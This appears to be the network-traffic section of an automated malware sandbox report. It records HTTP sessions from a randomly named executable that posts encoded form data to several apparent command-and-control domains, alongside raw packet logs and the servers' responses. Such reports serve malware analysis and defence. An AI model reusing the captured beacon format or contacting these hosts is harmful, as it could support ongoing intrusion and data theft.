                                                          Sep 11, 2024 22:06:34.542453051 CEST804975547.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:34.542570114 CEST4975580192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:34.544626951 CEST4975580192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:34.549485922 CEST804975547.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:34.549679041 CEST804975547.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:35.474220991 CEST804975547.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:35.474329948 CEST804975547.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:35.474379063 CEST4975580192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:36.049834967 CEST4975580192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:37.068394899 CEST4975680192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:37.073309898 CEST804975647.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:37.073419094 CEST4975680192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:37.075231075 CEST4975680192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:37.080030918 CEST804975647.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:37.962395906 CEST804975647.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:37.962440968 CEST804975647.239.13.172192.168.2.10
                                                          Sep 11, 2024 22:06:37.962677956 CEST4975680192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:37.965822935 CEST4975680192.168.2.1047.239.13.172
                                                          Sep 11, 2024 22:06:37.970813036 CEST804975647.239.13.172192.168.2.10
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49707 | 217.70.184.50 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 22:02:49.001437902 CEST | 463 | OUT | GET /p2ly/?bFGXGTdX=854srIWxIbaR7EG2BVBjn1PfwNbGMwTqcAT48G/3DKSB08gEc85mKKLIvkpoComultp7rI80f5482EKJDc++UJ/X9hbLrPJpiCWZeROTRI35j/SOzA==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.goodgiftguru.com
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Sep 11, 2024 22:02:49.639590025 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:02:49 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Vary: Accept-Language
                                                          Data Ascii: 797<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>goodgiftguru.com</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https:/ [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49709 | 199.192.19.19 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
Timestamp | Bytes transferred | Direction | Data
Sep 11, 2024 22:03:04.998111963 CEST | 722 | OUT | POST /oxoz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.fardvuss.top
                                                          Origin: http://www.fardvuss.top
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.fardvuss.top/oxoz/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=7v38maCPW6ubDHO+K7lDCrIuoGcDx85hmJma6OYOlMKHUAupYNjoDRPngu47QiYmdqy4auZrIRNzp6sBZmkBLtHLI6IXBVUUUqrgQc1GXKZlX5p9XmTDfAKfF55YRFupH4ndS1ix7JG84Q0lcAvCJ97AJeM/Wrny7O2gxtm2kXHZILmMfGhbumpvfR4s
Sep 11, 2024 22:03:05.636337996 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:03:05 GMT
                                                          Server: Apache
                                                          Content-Length: 16026
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Sep 11, 2024 22:03:05.636502981 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d
                                                          Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
                                                          Sep 11, 2024 22:03:05.636518002 CEST1120INData Raw: 37 31 39 22 20 78 32 3d 22 32 34 30 2e 31 31 33 22 20 79 32 3d 22 35 35 31 2e 37 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20
                                                          Data Ascii: 719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="186.359" y1="406.967" x2="1
                                                          Sep 11, 2024 22:03:05.636533022 CEST1236INData Raw: 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20
                                                          Data Ascii: "7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stro
                                                          Sep 11, 2024 22:03:05.636548996 CEST1236INData Raw: 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 53 6d 61 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36
                                                          Data Ascii: </g> <g id="circlesSmall"> <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx=
                                                          Sep 11, 2024 22:03:05.636620998 CEST1236INData Raw: 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 4d 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 6c 2d 36 34 2e 37 32 36 2d 31 37 2e 33 35 33 63 2d 31 31 2e 30 38 36 2d 32 2e 39 37 32 2d 31 37 2e 36 36 34 2d 31 34 2e 33 36
                                                          Data Ascii: -miterlimit="10" d="M338.164,454.689l-64.726-17.353c-11.086-2.972-17.664-14.369-14.692-25.455l15.694-58.537c3.889-14.504,18.799-23.11,33.303-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.08
                                                          Sep 11, 2024 22:03:05.636636019 CEST672INData Raw: 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 09 4d 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 63 35 2e 32 33 34 2d 33 2e 30 33 39 2c 37 2e 37 33 31 2d 38 2e 39 36 36 2c 36 2e
                                                          Data Ascii: stroke-miterlimit="10" d="M388.762,434.677c5.234-3.039,7.731-8.966,6.678-14.594c2.344,1.343,4.383,3.289,5.837,5.793c4.411,7.596,1.829,17.33-5.767,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.0
                                                          Sep 11, 2024 22:03:05.641469955 CEST1236INData Raw: 36 38 35 2d 35 2e 35 36 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d
                                                          Data Ascii: 685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" d="M241.978,395.324c-3.012-5.25-2.209-11.631,1.518-15.977c-2.701


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.10 | 49710 | 199.192.19.19 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:07.863334894 CEST | 746 | OUT | POST /oxoz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.fardvuss.top
                                                          Origin: http://www.fardvuss.top
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.fardvuss.top/oxoz/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=7v38maCPW6ubCm++IalDFLIhnmcDnM5tmJqa6L4eleuHUhepZPLoERPn4e5zPyYXdq+was9rIRZzp+gBZ3kCJ9HFAaIZFVUUUqrgQcwjXMxlXNt9WHTMeALtMZ5YVFutH4mIS2mL7L+84RElSyLFcN7CG+N8boeH+vaT7+z24XLMPqHLOXAM9R1hRXNGL8Lhpi0ehOlZS9ddtEv0Vg==
                                                          Sep 11, 2024 22:03:08.480758905 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:03:08 GMT
                                                          Server: Apache
                                                          Content-Length: 16026
                                                          Connection: close
                                                          Content-Type: text/html


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.10 | 49711 | 199.192.19.19 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:10.403425932 CEST | 1759 | OUT | POST /oxoz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.fardvuss.top
                                                          Origin: http://www.fardvuss.top
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.fardvuss.top/oxoz/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:03:10.994544029 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:03:10 GMT
                                                          Server: Apache
                                                          Content-Length: 16026
                                                          Connection: close
                                                          Content-Type: text/html


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          4 | 192.168.2.10 | 49712 | 199.192.19.19 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:12.934895039 CEST | 459 | OUT | GET /oxoz/?bFGXGTdX=2tfclvLQdcOBJmGnIZVAP5JMnkUnnIVvl5+7iv031/ylbgKII8HkCnHT6NNgDVU8buPmA9RxJ1d+vIxyZHsoGN30KfBqGUlKbJLPWs8oJbYVBexVLA==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.fardvuss.top
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:03:13.538608074 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:03:13 GMT
                                                          Server: Apache
                                                          Content-Length: 16026
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          5 | 192.168.2.10 | 49713 | 91.184.0.111 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:19.297724009 CEST | 734 | OUT | POST /sid8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.vacaturecast.com
                                                          Origin: http://www.vacaturecast.com
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.vacaturecast.com/sid8/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=RiC2SGYdlaRKSkJAwLgn+jAksVJp/8cSKUzlLaRSU20eUj56/ZROu+f4V8szZY1LgFZNHGBObv0IXmVCnreQN2f23l3T8/gwSNaLk2pVSm1i6eFIJ8l0ta8k4/iuC+ZQuOd3v2TBQ2R36cCM5U/dHncsVyFTddd40V7Xbq6y7jHw3YElywxF79ucg56D
                                                          Sep 11, 2024 22:03:19.921907902 CEST | 546 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.26.1
                                                          Date: Wed, 11 Sep 2024 20:03:19 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 305
                                                          Connection: close
                                                          Location: http://pacopodcast.nl/sid8/
                                                          X-Powered-By: PleskLin
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://pacopodcast.nl/sid8/">here</a>.</p><hr><address>Apache Server at www.vacaturecast.com Port 80</address></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          6 | 192.168.2.10 | 49714 | 91.184.0.111 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:21.832238913 CEST | 758 | OUT | POST /sid8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.vacaturecast.com
                                                          Origin: http://www.vacaturecast.com
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.vacaturecast.com/sid8/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=RiC2SGYdlaRKTEZA2qgn3jAnm1Jposd6KU/lLbVCUDseUCJ6+YROv+f4dcsyEo16gFU4HG9ObrcIXmlCncqRNmf06F3VyfgwSNaLk284Smti6u1IIdlrzq8r//iuG+ZcuOdVv037QzV36Z+M3l/eJncuKiE6cPsduQfLRJKomC349ZlijhQSoKySu/PpRoutSjlT6/QTDlr544wx/w==
                                                          Sep 11, 2024 22:03:22.474281073 CEST | 546 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.26.1
                                                          Date: Wed, 11 Sep 2024 20:03:22 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 305
                                                          Connection: close
                                                          Location: http://pacopodcast.nl/sid8/
                                                          X-Powered-By: PleskLin
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://pacopodcast.nl/sid8/">here</a>.</p><hr><address>Apache Server at www.vacaturecast.com Port 80</address></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          7 | 192.168.2.10 | 49715 | 91.184.0.111 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:24.665750980 CEST | 1771 | OUT | POST /sid8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.vacaturecast.com
                                                          Origin: http://www.vacaturecast.com
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.vacaturecast.com/sid8/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:03:25.415575027 CEST | 546 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.26.1
                                                          Date: Wed, 11 Sep 2024 20:03:25 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 305
                                                          Connection: close
                                                          Location: http://pacopodcast.nl/sid8/
                                                          X-Powered-By: PleskLin
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://pacopodcast.nl/sid8/">here</a>.</p><hr><address>Apache Server at www.vacaturecast.com Port 80</address></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          8 | 192.168.2.10 | 49716 | 91.184.0.111 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:27.200853109 CEST | 463 | OUT | GET /sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/+eDIKv47LadViiJNA0l9U7AJcEYo6/DJIlnE312L8+JFdumWlHM1LGtkr/t6bg==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.vacaturecast.com
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:03:27.843063116 CEST | 830 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.26.1
                                                          Date: Wed, 11 Sep 2024 20:03:27 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 449
                                                          Connection: close
                                                          Location: http://pacopodcast.nl/sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/+eDIKv47LadViiJNA0l9U7AJcEYo6/DJIlnE312L8+JFdumWlHM1LGtkr/t6bg==&M87d=RDddFbF8
                                                          X-Powered-By: PleskLin
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://pacopodcast.nl/sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/+eDIKv47LadViiJNA0l9U7AJcEYo6/DJIlnE312L8+JFdumWlHM1LGtkr/t6bg==&amp;M87d=RDddFbF8">here</a>.</p><hr><address>Apache Server at www.vacaturecast.com Port 80</address></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          9 | 192.168.2.10 | 49717 | 193.108.130.23 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:33.556015015 CEST | 722 | OUT | POST /6iyv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.drivemktg.co
                                                          Origin: http://www.drivemktg.co
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.drivemktg.co/6iyv/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=dWIDmaFMJdzFa1fVdNgnFo9K1k++FExv+tsbkcdiBFdusotmV8t4Ti+Bnp8cs0M9Zdp5LdwmAronPUOtwmV2amNLjeBa//Sbj/54oVlei8+Qh0I+Y1oezY8sR171niBSy8BMYWZhMxB1l/nleBEafoR2A/Nyk4sVq+HmleQOTiVEusO1Rgh2SyxG2Lds
                                                          Sep 11, 2024 22:03:34.587290049 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Connection: close
                                                          x-powered-by: PHP/8.1.29
                                                          x-litespeed-tag: fae_HTTP.200
                                                          content-type: text/html; charset=UTF-8
                                                          link: <https://drivemktg.co/wp-json/>; rel="https://api.w.org/"
                                                          link: <https://drivemktg.co/wp-json/wp/v2/pages/10>; rel="alternate"; title="JSON"; type="application/json"
                                                          link: <https://drivemktg.co/?p=10>; rel=shortlink
                                                          x-litespeed-cache-control: no-cache
                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                          transfer-encoding: chunked
                                                          content-encoding: br
                                                          vary: Accept-Encoding,User-Agent
                                                          date: Wed, 11 Sep 2024 20:03:11 GMT
                                                          server: LiteSpeed
                                                          Data Ascii: W-s'2C5?(3f;8[)4$VfaV>DB@H\F0USM$c}N-VV763UD/6&mh_[>}2Fe^BVSu\va)_eYP<IS$PRg/Hz%VPj%CB
                                                          Sep 11, 2024 22:03:34.587480068 CEST1236INData Raw: bd 03 c1 8c bd d5 3f de 25 e4 54 af 81 9b 42 34 2d 22 18 1c 5d dd 3d 88 13 88 5f 3b 06 d3 ea 5a 79 9e d4 e6 82 da 3f 0a 3c 00 52 0f 80 e4 03 cb b4 e6 c0 81 c0 aa 7e 9a e2 cc b6 34 d0 07 16 24 5a 95 b5 c9 95 2c 0f b0 2e f0 d8 1c ff 60 df 3c de 69
                                                          Data Ascii: ?%TB4-"]=_;Zy?<R~4$Z,.`<i#eQb6E\BxDz#S=PbDnq{R}zcN;h=- 5gF|!~l/oZ2806?>[Srb\G2Pa7:bJ{lI
                                                          Sep 11, 2024 22:03:34.587493896 CEST207INData Raw: cf 57 19 84 1f ef 69 27 f8 17 8b 4e 22 18 6c 23 3d 29 c5 d5 59 40 5e 3b 7b 12 54 0a 36 d0 33 ed 35 a1 fb 90 80 0e 34 51 32 af ed e8 50 88 5e 45 dd 9f 3a d6 b8 20 11 74 2f 68 a3 5f 35 fb 56 43 ad a9 d1 8f fe a7 1c cc b8 4c 7e 5c 7f 74 ff 5f 92 b8
                                                          Data Ascii: Wi'N"l#=)Y@^;{T6354Q2P^E: t/h_5VCL~\t_&_W<OW6as#Z?Dq{-07NN/y4Tu9mHH+L%*!XHL&3@pi5.Bg
